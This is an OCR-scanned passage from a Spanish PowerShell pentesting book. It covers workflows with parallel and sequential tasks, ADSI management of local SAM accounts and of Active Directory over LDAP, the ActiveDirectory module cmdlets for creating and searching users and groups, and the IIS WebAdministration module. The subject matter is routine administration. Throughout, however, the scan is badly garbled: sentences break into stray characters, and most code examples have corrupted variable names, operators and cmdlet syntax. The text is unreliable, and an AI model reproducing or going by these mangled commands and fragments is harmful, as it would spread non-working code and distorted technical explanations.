

T OE " nb AS P, W — id infi j 
veces el mismo workflow la salida o presentación de la información se en distinto orden. Se puede 


visualizar como las dos tareas son ejecutadas simultáneamente. 


En el siguiente ejemplo se ejecuta dos tareas en paralelo, pero una de ellas tiene varias instrucciones 


secuenciales. 


Directorio: 


Segunda 
Segunda 


unda 


C:NUsers 


LastUriteTime 


25/06/2912 
19/05/2812 
19/07/2812 
19/07/2812 
tarea 
secuencial 


sers? i64 


ctorio: CiNUsers 


LastWriteTime 


25/06/2012 
19/05/2012 
tarea 
19/07/2612 
19/87/2612 
secuencial 


Name 
Administrador 
Public 
i64.txt 
proc.txt 


Length Name 


fidministrador 
Public 


i64.txt 
proc.txt 


D $3 39. Eh 
Fig. 2.28: Ejecución en paralelo con tareas secuenciales 


PSComputerName 


localhost 
localhost 
localhost 
localhost 


PSComputerName 


localhost 
localhost 


localhost 
localhost 


da Ene - : a T 
puede observar en el código como existen dos tareas en ejecución paralelas, mientras que la 


imera tarea paralel: T e > " - ; ^ 14 : 
primera tarea paralela dispone de dos instrucciones secuenciales. En la ejecución se puede visualizar 


como la imera tarea naralela eier a 1 ` : 
la primera tarea paralela ejecuta dos subtareas o instrucciones de manera secuencial y en 


ningún cz |.eienutará i 
gun caso se ejecutará la segunda antes que la primera. 


Por el c : 
CO t u» c^ o ES ^ : 
ihi ontrario sí que se puede solapar la segunda tarea que se ejecuta en paralelo con las otras dos 
Strucc "S Y f : " Y 
«ciones que componen la primera tarea paralela. 
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Algunas instrucciones pueden provocar errores en el cuerpo del workflow y no ejecutarse o completar 
Es por esto que se utilizan los /n/ineScript, son pequeños bloques de script que se 


la tarea o subtarea. 
anteriormente daban 


ejecutan en el interior del workflow y permiten ejecutar esas instrucciones que 
error. 


Un ejemplo de código y ejecución de InlineScript es el siguiente: 


-uenciales de la primera tarea en paralelo 


ilditem 


E 


inda secuencia 


Scripti 


uepa 


InlineScript , 
En ejecución 


1.6: Línea i64:6 char:6 


Directorio: C:MUsers 


Length Name puterNan: 


fidministrador localhost 

Public localhost 
142 i64 - localhost 
pro localho: 


LastHriteTime 


19/07/2812 
19/87/2812 q:5 2114 
egunda secuencial 


Fig. 2.29 : Ejecución de InlineScript 


17. Otros productos 


En este apartado se estudiará la interacción con productos de Microsoft, como el directorio activó 
o Internet Information Service. También se explicará la mejor forma de utilizar los cimdlets qu 
proporcionan los módulos de directorio activo y de IIS. Esto proporciona una idea básica al pentesttt j 
que puede utilizar esta información para sus scripts, como hacen muchos frameworks de los que $ 


estudian en el libro. 


ro 
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Directorio activo, ¿Por qué? 

El directorio activo permite a los administradores gestionar los recursos, usuarios, permisos, políticas 
de seguridad de manera centralizada. Esta implementación utiliza distintos protocolos, como pueden 
ser DNS (Domain Name System), Kerberos, LDAP (Lightweight Directory Access Protocol) 


Se puede visualizar el directorio activo como una gran base de datos centralizada, accesible desde 
una red distribuida y organizada. En el directorio activo se dispone de objetos, que pueden ser 
usuarios, recursos y servicios, 


El objetivo de este apartado es explicar las herramientas que se disponen en Powershell para gestionar 
el directorio activo. Las tareas realizadas con Powershell sobre el directorio activo pueden resultar 
de gran utilidad al administrador en el instante de gestionar los seriprs para la automatización dc 


lareas. 


Para versiones previas a Windows 2008 R2 se dispone de ADSI, Acrive Directory Service Interfaces 
el cual soporta distintos tipos de directorios, por ejemplo. LDAP o la base de datos de ouentás € s 
de Windows SAM, Security Account Manager: ADSI no aporta riqueza semántica a Pon ial " 
que no existen emdlets. Cuando se requiera trabajar sobre bases de datos de cuentas locales e leb i 
utilizar ADSI, y en versiones servidor dónde no se disponga de la posibilidad de utilizar el módul : 
de directorio activo de Powershell también. i 


* r ? ! D2:s E K " ^ j 
En Windows 2008 R2 se dispone de un módulo para Powershell para la gestión del directorio acti: 
Este módulo aporta gran flexibilidad y sencillez para realizar las tareas de gestión del directori 


activo y su uso. siempre que se pueda. es altamente recomendado. El módulo dispone de un 
proveedor. como los vistos anteriormente en el libro. y un conjunto de cmdlets para la interaccí 
M J para ii teracción 


con el directorio activo. 


ADSI: La API para equipos locales 

ADSI puede interactuar con la base de datos de cuentas locales de los equipos cliente de Windows 
y las versiones servidor a excepción del controlador de dominio. Esta base de datos delióminada 
SAM, almacena objetos de tipo usuario y grupos de usuario. El proveedor que se cia la ac ela 
à estos objetos es WinNT: y hay que especificar que las mayúsculas y minúsculas. en pe es | 
tienen relevancia l B ann 


disponer de una lógica y c cimi 

lesa e una lógica y conocimiento de lo que se va a realizar. y en segundo lugar. optimizar e 
tbid S a - à : E ^ gar. La 1 
£0 de scripting para seguir un patrón e intentar automatizar el proceso. 


» 
ara gestionar este ^ ir de Ty NE 24 
gestionar este tipo de bases de datos se intentará buscar una estrategia para. en primer lugar 


El primer paso será 1 

ne Md asian — la $e nih ya sea local o remota. Para ello la instrucción 

WinNT: y se — ~ cae = Pt SU MANEA máquina ". La instrucción utiliza el proveedor 

niti leer rens i " requiem, si la máquina fuera local se debería ejecutar la 

Pee E : AD: J inNT:/S(hostname) . Para cualquier interacción con la SAM 
; on la máquina. 


ro 
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nsultas, inserciones o 


Una vez se dispone de la conexión abierta se puede empezar à realizar co 
modificaciones sobre la máquina. Es importante, para entender la estructura en la que ADSI trabaja, 
visualizar la máquina como un árbol dónde la propia máquina es la raíz. Cuando se crea un objeto 
usuario, éste colgará de la raíz que es la propia máquina. Cuando se crea un objeto grupo, éste se 
encontrará al mismo nivel que el objeto usuario. Dentro de los grupos se encuentra una lista de 
miembros, por lo que el objeto grupo será el padre del objeto miembros de usuarios de dicho grupo, 


| WinNT://«máquina» 


| 


winNT://<máquina>/<usuario>: 


winNT://<máquina>/<grupo> WwinNT://<máquina>/<servicio> 


MAL 


WinNT://«máquina»/«grupo»/«miembros» 


Fig. 2.30: Aproximación a la estructura WinNT: 


En los siguientes apartados se estudiará cómo realizar distintas acciones sobre usuarios y grupos, | 
pero se dispone de una estrategia global de cómo se realizarán las distintas consultas o modificaciones - 
sobre la SAM a través de ADSI. Por ejemplo, si se requiere colocar la conexión en un objeto grupo 
concreto, en vez de abrir la conexión como se explicó anteriormente, se debería bajar un nivel enla 
estructura de la siguiente manera $con = [ADSI] "WinNT:/<máquina>/<nombre grupo? group". 


Lo dificil en la presente estrategia es saber que propiedades y métodos utilizar para obtener 
información. Para ello se verán distintos ejemplos en los siguientes apartados. 


Ejemplo 1: Listado de usuarios 

En primer lugar y siguiendo la estrategia definida en el apartado anterior se crea la co 
apuntando a la raíz de la estructura. Después se invoca a los elementos que cuelgan de la raiz 
quedarse con los que son de clase user. Una vez realizada esta acción hay que mostrar el nom 
esos elementos. Para el ejemplo también se obtendrá el ültimo /ogin. 
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(hostname) ” 


[Write-Host $ .name S .iastlogin] 


¿Qué prd se puede obtener de los usuarios? Esta interesante pregunta que respondida 
cuando al código anterior se le elimina el ültimo bucle, obteniéndose la lista de propied de 5 i 
puede consultar de un usuario. — 


Ejemplo2: Listado de usuarios remotos 


C on | siguiente ejemplo se quiere generaliza e i s rem S e 
> g n las acciones remotas con AD 


Es importante recalcar que existen distintos métodos para acceder a la lista de usuarios de la máquin 
»mot: se j i A ET una 

remota. El gems ejemplo especifica cómo utilizar ADSI para que interactüe de m ; 

con otra máquina. anera remota 


ie - ——— debe cumplirse una premisa y es que el usuario con logueado en la máquina 
ocal de e existir en a máquina remota y ser administrador. Tras este requisito, el código del eje 
anterior cambia simplemente en la conexión. lass 


"ofi I]"WinNT://«nombre máquina remota»" 
Scons. .Chiidren | whereíS E ape " 
f hi iren | where(3_.psbase.schemaclassname -eq ‘user’ 
Aranart isai I fore;zc i n usert*] ore & 
prop ) | foreach (Write-Host $ .name $ .lastlogin) WP "T 
= AD scloqirn 


Ejemplo 3: Crear usuario 


En primer lugar, c en las ocasi i 
: ium mer lugar, ce — ocasiones anteriores, se debe crear la conexión apuntando, en este caso 
a máquina, ya sea local o remota. Se dispo : i a i. 
y R ne de un método denominado Cr 
—————— a nado Create al cual se le pasa 
uario y el tipo user. Se puede, y es recomendado, asignar una contraseña al po 


otn = [ADSI 


"WinNT://«nombre máquina»" 


, 


Create ( user',«nombre usuario») 


>) 


rd («contras 


El nombre i 
: e de usu: rlac señ 
pt ip uario y la contraseña deben ser una cadena de texto. El método Ser/nfo realiza la 
in : ID permanente del usuario en el sistema. Por defecto, el usuario deberá cambiar 
sena en el siguiente inici ia : > : 
disponer de una Pow guiente inicio de sesión y para realizar la creación de los usuarios hay que 
a Powershell con elevación de privilegios. PP... 


Ejemplo 4: Eliminar usuario 


Para la eliminación de un u 


a suario simplemente debe ejec ; z ; sadi 
de objeto que es. icta Į e ejecutarse el método Delete indicando el tipo 


| nom i ES : imi 
bre del usuario que se desea eliminar. Por supuesto. en primer lugar 


que realizar | ió 
à conexión apuntand áqui 
o a la máquina, 3 iv ; i 
M irr q que es el nivel dónde cuelgan los usuarios. 


nomb áquina 
«Delete ( ise p? . re máquina»" 


«nombre usuario») 
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ADSI: La API para Active Directory 

El directorio activo podría ser tratado con el proveedor WinNT, pero se simplifica la gestión utilizando 
el proveedor LDAP, que está creado específicamente para este uso. La estrategia para la gestión del 
directorio activo es similar que la utilizada con WinNT. En primer lugar se deberá conectarse al 
objeto del directorio activo y realizar su administración. 


LDAP utiliza unos parámetros especiales para indicar ciertos valores en el momento de la conexión, 
consulta, modificación de valores de los objetos del directorio activo. En la siguiente tabla se facilitan 
los utilizados en el presente apartado. 


Descripción 


Identifica de forma univoca un objeto en la estructura del directorio. Se 
puede ver como la ruta hacia el objeto, especificando CN, OU, DC 


mM 


Tabla 2.10: Parámetros LDAP. 


El DN, Distinguished Name, comienza por el CN. Common Name, y se va especificando los 
elementos que hay por encima del objeto hasta llegar al dominio, es decir, pasando por las diferentes 
OU, Organizational Unit, hasta el DC. Domain Component. 


Conexión al AD 

La conexión al directorio activo puede realizarse en local o en remoto. Esta ültima conexión es, 
generalmente, la más utilizada para administrar distintos dominios. Para realizar la conexión a la 
raiz del dominio actual se ejecutará el siguiente código. No se especifica ningún objeto concreto, ya 
que no se tiene porque saber que objetos componen el dominio. Esta conexión es ideal para, una vez 
conectados. realizar la búsqueda de objetos a través de la estructura. 


$dominio [ADSI]'LDAP://D0C-164,DC- ocal' 
borra opción equivalente es 
$dominío = [ADS1]'' 


Si se requiere una conexión a un objeto en concreto, sería tan sencillo como almacenar en 
una variable el objeto que devuelve la cadena de conexión, S$dominio = [ADSI] LDAP:/ | 

, r + -- ` n BK i 
G N=<ohjeto>,OU=<nombre 0U>.DC=<dominio>,DC=<dominio raiz . i 


a sea para conectar 


Para realizar una conexión con las credenciales de otro usuario administrador, y 
e desea utilizar 


à otro dominio distinto en el que no se encuentra la máquina origen o porque s 
otras credenciales en mismo dominio, hay que utilizar la clase de .NET Framework Syst 
DirectoryServices.DirectoryEntry. Se explicarán a lo largo del apartado las distintas clases de. 
Framework que son necesarias para la administración del directorio activo. 
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La sintaxis es sencilla, hay que crear un objeto de la clase anteriormente comentada indic 

en la cadena el nombre del dominio o IP a la que se requiere conectar, el usua en Vc ipm 
administrador, y la contraseña. Un ejemplo de esta sintaxis es: Sdominio - — debe ser 
DirectoryServices.DirectoryEntrv('LDAP://«IP o nombre dominio ' sos s a asa: aari- 
'<contraseña> '). CSS administrador ', 


Buscar objetos en el AD 


Una - E "na aea como realizar las conexiones con la estructura del servicio de directorio la 
büsqueda de objetos va a resultar muy sencilla. Se utilizará un filtro con el que obtener los objetos 


requeridos por el administrador y 2 métodos que m á 
- ostrarán todos los valores filtre aw 
los encontrados. ores filtrados o el primero 


La — sevaa poder realizar de cualquier tipo de objeto, incluso se podrá utilizar metacaracteres 
con los que conseguir ampliar el abanico de la búsqueda. Para la búsqueda de objetos se utiliza l 
clase de NET Framework System.DirectorvServices. DirectorvSearcher . iza la 


La estrategia que se seguirá es la siguiente, en primer lugar se obtendrá la conexión al dominio raíz 

ya sea local o remoto, o la conexión al objeto en concreto sobre el que se rec "e e E 
a partir de dicho nivel. Una vez creada la conexión se creará el objeto de im coin ien AP 
la clase mencionada anteriormente. Este objeto dispone del método Filter el "n a, * partir de 
para. mediante reglas, filtrar los objetos. Por último se utilizará los métodos Fin pe. MN 
función de si se quiere mostrar el primer objeto filtrado o todos los filtrados — 


lominio = [ADSI]'LDAP://DC-i64,DC-10cal* 


rcher (Sdominio) 


Hay que recalcar que el filtro puede llevar comparaciones cor puestas, es decir. con Y lógicos 


u 0 lógicos. Un J p pa B . 
OS » l 1 ^ mpa n se 5 ) 2, " ter= d 
ejemplo dc esa con ració ria busquec d. F il ei (& fe omparac ión!) 


Ejemplo 1: Listar equipos 


El código par Is a S ( i )OS que se 

s a list r lo qui q > n ini 

"on .. encuentran en el do o 1 F.. Tr i 

— > P si - l mint sobre el que sc ha ealizado la 


sdominic 


“Vdusqueda = New-Object : 


Ibusqueda.Filt yS 


er-' (objec -ySearcherz(Sdominio) 


*busqueda, FindAll 


E : Li 
ni 2: Listar usuarios y grupos 
código ara e ute m : 
. Sis * * s de usuarios y grupos es similar, salvo que en los usuarios hay que listar 
rado pertenece a una categoría denominada persona. l 
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Administración 
La administración sobre el directorio activo se realiza. principalr 


mente, sobre usuarios. grupos y 


unidades organizativas. En algunos casos el código para llevar a cabo ciertas acciones es similar 


entre estos objetos. 


En el presente apartado se explicarán de manera conjunta las acciones similares entre estos objetos, 


y especificando los casos en los que no son iguales. 


Ejemplo 3: Crear objetos 

En el siguiente ejemplo se muestra la creación de objetos. usuarios, grupos y unidades organizativas. 
Se utiliza el método Create, Put y Setlnfo. El primer método crea el objeto sobre la ruta LDAP 
El segundo aplica cambios sobre el objeto y el tercer método hace 
ctorio activo. Estos métodos han sido estudiados en el apartado de 


especificada en la conexión. 
el objeto persistente en el dire 
gestión de cuentas locales. 

do utilizar el atributo UserPrincipalName, para 
que se utiliza el protocolo Kerberos en vez de 
unidad organizativa o en la raiz 


En la creación de usuarios es altamente recomenda 
aplicar seguridad más alta en la autenticación. ya 
utilizar NTLM. Los usuarios pueden almacenarse en un contenedor, 
del dominio. En el ejemplo, se almacenará en el contenedor de usuarios. 


IT] LDAP: 


n=<nombre usuario» ) 


mpre usual Es) 


La creación de unidades organizativas es similar a la creación de usuarios, simplemente hay que 


indicar que lo que quiere crear es una QU. 


Para crear una unidad organizativa en el interior de otra. la cadena de conexión sería Sdomini0, 


[ADSI] LDAP://QU- «ou padre>,DC I paths, DC=local”. 


Ejemplo 4: Mover objetos 
Para mover objetos dentro del directorio activo se dispone del método MoveHere. Este 
también se utiliza para renombrar el nombre de los objetos. La semántica es sencilla, en 
lugar, se crea un objeto que apunta a la ruta del proveedor LDAP, esta ruta es el destino del 


ro 
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— EN 


ue se quieti Ov . ` * i ata E a, 
1 1 [S l ^ J cuta el c od i fc veHere pasa do « Jal ( I 
(TC move Jes PUES, se ejecuta metodo | ?] P ( on o] irametro la uta 


será el origen, del objeto que se quiere mover. - 
à a OU de la raiz 
= 311^ LDAP: 
stino.MoveHere ( "LDAP: / i. 
- DC-local',^Qu- leva nombr 
ths,DC-local','CN- «nombr: 
','CN- «nombre 
Cmdlets desde Windows 2008 R2 
La versión Windows Server 2008 R2 di i 
—PÜ r 2008 R2 dispone de un módulo, que se instala en el servidor ] 
4 e ectory es agrege i e i i | xir ieri 
y gregado. Este módulo aporta un proveedor con el cual pode: € 
a " navegar 


or el directorio activo co Bi ch 4yhfacs " 
du eR ia - si se tratase del sistema de archivos. También aporta un j 
i ets c el aue realizar las tareas ns oi S " E conjur 
Po l pe ar las tareas de administración sobre el directorio activo. P cae 
se dispone del c " : & . Para carear e 
— emdlet Import-Module. La instrucción para care: ^ii itin 
Module ActiveDirectory. para cargar el módulo es Import- 


El proveedor de Active Directory 


El proveedor facilit: ió 
acilita la /egac "ET : . 

encontrase nas l navegación por el directorio activo de tal forma como si el 
ase navegando por el sistema de archi idi ario se 
iei avegz e por el sistema de archivos. En el proveedor se puede utili i we nn 
ásicos para crear. e ica scs > * ede utilizar los emalets 
para crear, eliminar, listar y moverse por el sistema de archivos. saly ur Jos euni 
. salvo que 


acciones se realizan sobre el directorio activo ene ver a 


Una vez el mó j 

a módulo Active Directory está 
gs ti - "— Directory está cargado se accede a él con la instrucción ed 
ase de unidz Hi Trerar el ide di po 
unidad. Para listar el contenido, directamente /s o eer-childitem " 
C:NUsersNfüidninistrad ! " 
s 0r - 
D:N) Get-GRPAdItem o o TAS 


ad: como si 


ishedName 


domainDNS DC-1i64.D 


confi "ati f 

can iguration SN-Configurat ion. DC=i64 DC=local 

A GH-Schena-CN»Conf iguration DC-i64,DC 

donainDNS ;-DonainDnsZones,DC-i64,D6-1 eel 
DC-ForestDnsZones.DC-164. DC- Ios ci 


iguration 
nDnsZones 
tDnsZones 


Fig. 2.31; Acceso v li Y 
E l; Acceso x listado de recursos en el p weedor de Active Directory, 
Para la nave nac iÓ o e a E 
gi -tón ent ` isti Yes Ss ndo cd € 
> e los dis 3 i i 
inl. stintos contenedc es del directorio activo se utiliza el coma d 1 
r 5 ` lä £ k j 


-d navega ión se re l n S s completa ue se estudiar "O vee 
L AM 
alza con las rutas c p q a )I 
LD de l sS es es udi on con el I O /eedor 
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S AD:N? Set-Location » NDC-i64, DC-local 
PS AD:NDC=i64,DC=10cal> ls 


inguishe dName 


builtinDomain e - 
container DC=i : al 
Donain organizationalUnit ou i ntrollers.D 64,DC-local 
ForeignSecurityPr..- container QU Dona ianSecurituPrincipals.DC-i64,DC-local 
Infrastructure infrastructurelpdate A Infrastructure, DC-i64, DC-local 
ostündFound lostfndFound CN-LostandFound, DG-164, DC- local 

Managed Service fi... container CN-Managed Service ficcou s,DC-i64,DC-1local 
INTDS Quotas nsDS-QuotaContainer CN-NTDS Quotas-DC=i 
Program Data container CN=Progran Data, DG 

CN=System,D' i64,DC 


System container 
container CN=Users DC 164.DC-1ocal 


Fig. 2.32: Cambio de contenedor y listado de objetos 


Ejemplo 1: Crear objetos 
objetos existen los cmdiets cuyo verbo es New. 


En el siguiente ejemplo se 
ganizativas y equipos. En la siguiente tabla se 


Para la creación de 
estudiará la creación de usuarios, grupos. unidades or 
especifica el cmdlet para cada requisito. 


Crea un nuevo usuario en el AD 


Crea una nueva unidad organizativa 


New-ADOrganizational Unit 


Tabla 2.11: Cmdler de creat ión de objetos. 


a creación personalizada de los objetos. A 


Estos emdlers disponen de bastantes parámetros para l 
es del emdlet New-ADUser. 


continuación se muestra en la siguiente tabla los más interesant 


Indica si la cuenta debe estar habilitada o deshabilitada. Se espe] 
as variables booleanas $true o false 


cifica con 
n formato - 


ontraseña. Se debe especificar € 
SecureString 


Indica una nueva € 


a contraseña se puede cambiar o no. Se especifica: 
mediante valores booleanos 
debe modificarse en el sigu 


sesión 


Indica si ! 


¡ente inicio? 


Indica si la contraseña 


New-ADUser 


Tabla 2.12: Parámetros de 
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El SIE uiente C i € £ E c t c € dac E 
el odio crea un usuario nombre y [s X can A trase 
L con cua o I dara l | I 
~ d J a a P a il ] 32 a y 
- = { x 


det era camt iar / i ici ole d «uc 
sera C a clave en el Siguiente iniCIc d ses ión y la cuenta e tá | l ili d 
) lav el SIE ) de Ses £ sta hapı Itad: 


Por seguridad el parámetro de la clave s : 

iit i ada p : Um la clave se obtiene mediante el cuidlet Get-Credential 

e ] e tipo Secur 3 É 1-C redent TO S " 
: po SecureString, por lo que hay que acceder al atri aential, pero salo se 

ese tipo. : er al atributo password que es de 


En la creación de grupos hay que tene E 

etiem feo s que tener en cuenta si el grupo es local, universal o global 

dis gran cantiga "Onie - S > sal o global. Este cnidle 
abla se puede visuali e propiedades, que merecen estudio por parte del | Sad Este emellet 
tabla se puede visualizar algün parámetro interesante el lector. En la siguiente 


Parámetro Descripció 
escripción 
GroupCategary ica si 
gor Indica si el grupo es de distribución o seguridad 


GroupScope 


Indica el ámbito del grupo. Puede ser 
DomainLocal, Global, Universal 


Índica la r 
uta del contene i 
dor o unid: reanizati S 
nidad organizativa dónde se creará 


el objeto 


aica ` a. 
In ] Cé las crede ciales con las que el objeto se creara No co l 
£ unt 


Credential 
con las claves de los objeto usuario 


Tühbla 214 
Tubla 2.13: Parámetros de New-ADGroup 
t 


e codig c a € 
I siguient O l 49) proporcior a la creacio de un grupo 5 obal er la ruta indi ] 
€ cada po el usua 


ew-ADGrour Mame miGtr 
uj -GroupScor ilb " 


T lpat! 'e oi y p qory Securil -— 


Ejemplo 2: Buscar objetos con filtros 


Para reali r bus 
za t u que c 
` das dentre ] l li ( i 

I lis s 9 del directorio activo Y 
A 5 es interesante mo I! Iw 
: | | y^ ) ». - Mo a ( conocer el concept d | Hr 

. a que po der realizar las búsd p ( ] ; | 
rendimiento da a los il os son los meta quedas, ero lc que mayo! flexit ilid: d M 


El filtro d Ss T te l to l ) >| u rio conoc sinta de s DUS > ] P 
l DAI es reg € iti sobre todo si € sua conoce la s 15 (de 1 S 
SI almen u il ore i i 
"ES I SI ] suaric noce ii i X] 3 | | E 
` dAls das usquedas. El 


emdlet Get 1D , 

-ADObject permi à 

: rmite consult: vn anaba n 

de distintos alos sultar información del directorio activo, se realiz 


büsqueda de 


Én L 7 
el siguiente código se 
Por la letra p. 


Get-ADObjec: 
5e devuelve + 


tos. Este emdlet di "c T. T 
u dlet Pind a la recuperac 

Objetos que encaj dispone del parámetro LDAPFilter, el cual se encar ——— 
s que encajen con el filtro LDAP indicado se encarga de realizar la 


puede visu liz Ir L J c p I C 
sua ar un r 1 b I S e en Z 
filtro DAI pa a recupera los usuario qu 1 1 11 


Pentesting con PowerShell | 


iltro genérico con el que realizar büsquedas de 


El emdlet Get-ADObject también dispone de un f 
a una cadena de caracteres con la que se 


objetos. Este parámetro es Filter, el cual recibe como entrad 
puede escribir reglas sintácticas de lenguajes de programación. 

a un filtro genérico para realizar la búsqueda de unidades organizativas 
a W, y otra búsqueda para cualquier usuario. Hay que recalcar que la 
ta del proveedor del directorio activo dónde se encuentre el usuario, 
o activo, sobre la raíz de éste. 


En el siguiente código se utiliz 
cuyo nombre empieza por la letr 
búsqueda se realizará desde la ru 
o si por el contrario, no se encuentra en el proveedor de directori 


and (name -like 


Get-ADObject -Filter 1 (Obj -eğ 'organizationalUnit' ) A 

Sykt y} 

Get-ADObject -Filter (| (0bjec ss -eq 'user')) 

BPara mostrar todos los objetos se utiliza el filtro con el asterisco 


Cet-ADObject -Filter 


Adición / Eliminación de miembros a un grupo 
o se dispone de los cmdlets Add- 


e sencillo añadir y eliminar usuarios 


Ejemplo 3: 
Para la adición o elimir 
ADGroupMember y Remove 


a un grupo. 


ración de miembros de un grup 
-ADGroupMember. Es realment 


kAdición de grupo 
l usuario2» 


suarit , 


Internet Information Services 

adelante IIS, también dispone de la 
rshell. Existe un módulo integrac 
ar el entorno de 


posibilidad de ser gestionado 
lo en las plataformas Windows 
| gran servidor para todo de 


Internet Information Services, en 
a línea de comandos Powe 


mediante l 
as funcionalidades para gestion 


la cual ofrece distint 

Microsoft. 

a Powershell depende del sistema operativo en el que se esté 

acceder a Panel de control -> Programas y características 
ventana se debe buscar las 


Una vez en esta 
„ntas de administración weh las funciones 


Para poder disponer del módulo par 
ejecutando IS. Para Windows 7 se debe 
-> Activar o desactivar características de Windows. 
características de IIS y habilitar en la carpeta Herramie 
seripts y herramientas de administración de IIS. 

ar un módulo extra instalable en el servidor para poder 


orver 2008 se debe descarg 
erver 2008. 


En Windows Se 
utilizar la gestión mediante línea de comandos en Windows S 
b/gallen 


ido desde la siguiente URL http://www.microsoft.comAve 


El ejecutable puede ser descarg: 
3bIISPowershellSnapin. 


install. aspx?appsxmi=*ap jid - HSPowershellSna, jin? 
px: apr pr j 

viene instalada por defecto, pero no activada, la posibilidad de util 
IL. Se activará cuando se instale el rol de IIS en el servidor Y 
herramientas de administración de IIS debe ser agrega 


En Windows Server 2008 R2 
el módulo de IIS para Powershe 
indique que la funcionalidad script y 
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E Seleccionar servicios de función 
24 8 


Antes de comenzar 
Fundones de servidor 
Servidor web (IIS) 


Seleccione ói 
los servidos de funaón que desea instalar para Servidor web (115): 


Servicios de fundón: 
* Descripción: 
TT Registro ODBC Senpts y herramientas de 
zi [El Seguridad adminis TUTAE - 
ES g r proporciona un 
LT E E infraestructura para administrar , 
ic: NN mediante programación un servidor 
¡peras - ee rn comandos en 
Autentica ventana de comando: 
pasante de asignaciones de certificado de d étutando scripts. Puede usar estas 
[sr E i 
A nticacón ic asioradónes de atado ded herramientas si desea automatizar 
sei ana comandos en archivos porlotes o 
cuando desee evitarla sobrecarga de 


] 


I 


om 


[Y] Filtro de solicitudes 
E. NUR disp: — IIS mediante la interfaz de 
Ej {a Rendimiento 4 

[4 Compresión de contenido estático 


- Compresión de contenido dinámico 
=} E4 Herramientas de administración 
[J| Consola de administración de IIS 
Z Scripts y herramientas de administración de IIS 
L| Servicio de administración 
m. d 
L_ Compatibilidad con la administración de 115 6 
5 e IIS 
LJ] Compatbilidad con la metabase de (15 6 
L. Compatibilidad con WMI de 115 6 


Ldoaesenisrider de 
de nri de Tc 


Fig. 2.33: h lo j 
g. 2.3: itiatat 2 
g alación del módulo en la versión Windows Server 2008 R2. 


Una vez instalad ili : 
stalado o habilita i realizará la i 
manera totem i v. el módulo se realizará la importación de los emdlers de la sigui 
— vebadministration. Para comprobar el número de cmdlet. M inermem 
i A en en este nuevo mó > Gestió 3 apodo Amonio 
— evo módulo de gestión de IIS se puede ejecutar la sigui á Le 
imand -module webadministration — 


En la siguiente i 
. Siguiente Imagen se 5, Bassi " - 
le condis ullas ain puede visualizar la ejecución de ambas instrucciones v 

ets, alias y funciones disponibles. strucciones y una pequeña lista 


:NUsersNüdnini and Hod 

à ER E administr 

istrador> Get-Command -Module webadninist t 
stra 


Name 
fidd—WebGonf igurat ion 
fid d pepodne giat Tunlock 
S d-MebConfigurationPropert 
ackup-WebConfiguration T 
Begin-WUebGConnitDelay 
HIM deadonbiguestinn 
aoar cope auestisacingsettin S 
a ication AT 
p sable MaleioHa Module 
e nuc e nieuuesErpacing 
ia roba tHadu le 

e—WebRe s "aci 
Aeee ho ag n8 


Fig. 2.34: Importación del módulo de TIS (1" parte) 


målet 
ind let 
And let 
nd let 
'Mmdlet 
ind let 
undlet 
Alias 
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Get-WebñppDomain 
Cet—-Webñpplication 
Get-HebûppPoolState 
Get-WebBinding 
Get-WebConfigFile 
Get-WebConfiguration 
Get-MebConf igurationBackup 
Get-VebGConf igurationLocation 
Ge t-MebConf igurationLock 
Get-WebConf igurationProperty 
Get-MebFilePath 
Cet-VebGlobalModule 
Get—WebHandler 
Get-WebltemState 
Get-VebManagedModule 
Get-MebRequest 

Get-Mebsite 
Get-MebsiteState 

Get-WebURL 

Git Wen rear dee 


Fig. 2.34: Importac ión del mé 


tulo de IIS (2" parte) 


En Windows Server 2008 no existe e emdletimport-module por lo que, tras la instalas TE 


anteriormente, se debe ejecutar el acceso directo, creado tras la instalación, que carga el módulo en 
la Powershell. 

cmdlets y alias disponibles 
Module 


Como dato de interés se puede obtener el nümero de funciones, 


con la importación de dicho módulo con la siguiente instrucción (set-command 


webacdministration).count. 


El proveedor de 115 


Como se ha mencionado en alguna ocasión en est 
facilitando al administrador la manipulación del entorno. 


gestión y navegación 


e libro el proveedor facilita la 
IIS dispone de un 


sobre los objetos. 
proveedor al cual se accede mediante la instrucción iis: 


o cd iis: como se puede visualizar en la 


imagen de ejemplo. 


PS C:N 04/26/2812 18:29:01 > cd iis: 
PS IIS:5Sites 94/26/2012 18:29:04 > ls 


ID Physical Path 


Bindings 
http »: 0H: 
ftp x:21: 


State 
/SystemD 


Started 
G:NinetpubNftproot 


Default Web Site 1 
2 Started 


IIS. 


Fig. 2.35: Acceso y listado de recursos en el proveedor de 


ndlets básicos, pero lo más interesante es utilizar los cmdldt 


aporta el módulo de IIS para Powershell. Para la naveg distintos elementos 
Cuando se realiza un listado sobre una ruta que contitti 
lizar como se detalla el estado d 
nido de la aplicación Y 3 


En el proveedor se pueden utilizar los c 
que ación entre los 
proveedor se utiliza el cmdlet set-location. 
aplicaciones, por ejemplo sobre la ruta IIS: Sites, se puede visu: 
aplicación, en ejecución o parada, la ruta física dónde se aloja el conte 
puertos y protocolos están atadas dichas aplicaciones. 


€ 
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EC 


ippii ation pool o pool de ap i me n "OCesOo e agrupan [e] e ap 
,U» Up] ; * ~ is 
y ( pircac nes sor p S aL agrui un njun € I 
/ 1 t [o de aj acion 


Los pool definen algunos aspectos 2 
1 gunos aspectos de seguridad y propiedades de las aplicaci 
dentro del pool. Pme ades de las aplicaciones que se ejecut: 

es ex SLULa 


ara crear un x EA O 

Para cre nuevo pool de aplicaciones se puede ejecutar el emdlet l 

"T ar ` 2 igir pen : ies ) | ir 

ejecutar un « mdler básico como es new-item indicando como ruta | sign Pi 
ME Y a ¿ como ruta la del provee S 

e aoi qut y ien cio a la del proveedor IIS, por ejemplo 


IPS C:« 84/26/2012 22:H3: 
PS C:N 8 AS 
4/26/2012 22:83:50 > New-WebfippPoo1 pooll64 


fipplications 


Started Default Web Site 


Started Wee 
Started 
Started 


Fig. 2 


> » 
?6 enri 
5: Creación de un pool de aplicacic ne 
j Ones 


A c MWnuack C ^ € > € 
aci SC CS C O c c c 
i can distin s comana ; qi [ c 5 ( 
y 1 "SD ( ( 1 |! izad pare » 
Ec 10 


Cmdlet 
Descripción 


Get-Wi h ÍIpnP | ] cd 
bApnPoolStat ndica el estado en el que se 
ppt'oolStafe stado en el que se encuentran los distintos 


> — Nt ul ( £ 
aplicaciones de la máquin 


limi " j " 
2 una < Of Que s SI ij | lei 
d : v especifique junto al cmidlet lambi n 


Remove Wel 
se no ane 
e podría eliminar con remove-item LIS 


IDDF OOÍS 


7 
pool 


Restart-WehAnpp Reinicia e , 
( IppPool Reimicia el poo de aplicaciones deteñicnd í 
s s, deteniendo las aplicacione 
